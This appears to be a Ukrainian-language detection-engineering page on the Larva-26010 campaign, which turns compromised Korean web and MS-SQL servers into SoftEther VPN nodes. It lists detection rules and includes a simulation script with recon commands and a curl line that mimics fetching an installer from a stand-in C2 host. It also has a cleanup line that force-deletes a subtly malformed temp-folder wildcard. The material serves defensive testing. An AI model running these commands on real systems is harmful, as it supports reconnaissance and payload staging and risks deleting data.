Кампанія зі зловмисним ПЗ націлена на корейські веб-сервери під управлінням SoftEther VPN
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Зловмисник Larva-26010 націлюється на веб- і MS-SQL сервери в Південній Кореї для розгортання SoftEther VPN. Скомпрометовані системи переобладнуються в VPN-сервери, що потенційно використовують каскадні з’єднання, щоб приховати справжню інфраструктуру C&C зловмисників. Втручання зазвичай починається з компрометації веб-сервера, з подальшим розгортанням веб-шеллів і SQLShells.
Розслідування
Центр аналітики безпеки AhnLab виявив нещодавні атаки, що відбувалися з квітня по серпень 2026 року. Розслідування виявило зсув у послідовності атак: спершу компрометовані веб-сервери, далі команди з виявлення, встановлення SoftEther VPN та наступні атаки на MS-SQL сервери для розгортання CLR SqlShell. Зловмисники також використовували інструменти такі як PowerShell, bitsadmin, і certutil для доставки даних.
Пом’якшення
Адміністратори повинні перевіряти веб-сервери на наявність уразливостей, які можуть бути експлуатовані, і перевіряти всі значення введення, використані в запитах до системи керування базами даних і запитах до веб-сервісів. Дозволи на виконання повинні бути обмежені у каталогах завантаження, а веб-сервери IIS та операційні системи повинні бути повністю оновлені. Антивірусні та інші засоби безпеки, такі як V3, повинні бути оновлені до найостаннішої версії.
Відповідь
Якщо виявлено шкідливу активність, постраждалі веб- і MS-SQL сервери повинні бути негайно ізольовані, щоб обмежити боковий рух. Розслідувачі повинні визначити масштаби розгортання веб- і SqlShell, а також перевірити новостворені облікові записи користувачів на предмет несанкціонованих адміністраторських облікових записів. Налаштування реєстру, такі як UseLogonCredential , також повинні перевірятися на підозрілі зміни.
Потік атаки
Детекції
Використання Certutil для кодування даних і операцій з сертифікатами (виконання через cmdline)
Завантаження або вивантаження за допомогою Powershell (виконання через cmdline)
Можлива системна інвентаризація (виконання через cmdline)
Можливе виявлення конфігурації системної мережі (виконання через cmdline)
Можливе виконання шляхом використання короткого імені скрипту (виконання через cmdline)
Підозріле використання CURL (виконання через cmdline)
Підозріле завантаження файлу з прямою IP-адресою (виконання через proxy)
IOC (HashMd5) для виявлення: випадки атаки на вітчизняні веб-сервери, що запускають SoftEther VPN в Кореї
IOC (SourceIP) для виявлення: випадки атаки на вітчизняні веб-сервери, що запускають SoftEther VPN в Кореї
IOC (DestinationIP) для виявлення: випадки атаки на вітчизняні веб-сервери, що запускають SoftEther VPN в Кореї
Виявлено потенційну DoS-атаку AWS CloudFront [AWS Cloudtrail]
Завантажувач PowerShell та підвищення привілеїв через створення облікового запису користувача [Windows Powershell]
Визначення Microsoft Windows та встановлення SoftEther VPN [Веб-сервер]
## Виконання симуляції
Передумова: Попередня перевірка телеметрії та базового рівня повинна бути пройдена.
Обґрунтування: У цьому розділі детально описується точне виконання техніки противника (TTP), призначеної для виклику правила виявлення. Команди та описи ПОВИННІ безпосередньо відображати ідентифіковані TTP та прагнути генерувати точну телеметрію, очікувану логікою виявлення. Абстрактні або невідповідні приклади призведуть до неправильної діагностики.
-
Розповідь атаки та команди: Зловмисник отримав початковий доступ через вразливість веб-сайту. Для сприяння боковому пересуванню та встановлення стійкої задньої двері їм потрібно відобразити локальну мережу та завантажити інсталятор SoftEther VPN. Зловмисник виконує
ipconfig /allдля відображення інтерфейсу,whoamiдля підтвердження привілеїв, та використовуєcurlдля отримання програми-інсталятора з віддаленого сервера командування та контролю (C2). Ця специфічна послідовність розроблена для виклику логіки виявлення “Встановлення SoftEther VPN” шляхом точної відповідності рядків командного рядка, визначених у правилі Sigma. -
Скрипт тестування регресії:
# Скрипт симуляції: Визначення SoftEther та завантаження даних # Цей скрипт виконує точні команди, які шукає правило. Write-Host "[+] Початок фази виявлення..." -ForegroundColor Cyan # Тригер selection_command_lines: 'whoami' whoami # Тригер selection_command_lines: 'ipconfig /all' ipconfig /all # Тригер selection_command_lines: 'netstat -ano -p tcp' netstat -ano -p tcp # Тригер selection_command_lines: 'systeminfo' systeminfo Write-Host "[+] Початок фази завантаження даних..." -ForegroundColor Cyan # Тригер selection_images: 'curl.exe' ТА selection_command_lines: 'curl -h' # Примітка: Ми використовуємо -h, щоб залишатись в логіці правила, імітуючи намір завантаження curl -h https://example.com/softether_installer.exe Write-Host "[+] Симуляція завершена." -ForegroundColor Green -
Команди очищення:
# Жодні файли насправді не були завантажені в цій симуляції, # але ми переконуємось, що жодні артефакти не залишаються. Remove-Item -Path "$env:TEMP*" -Force -ErrorAction SilentlyContinue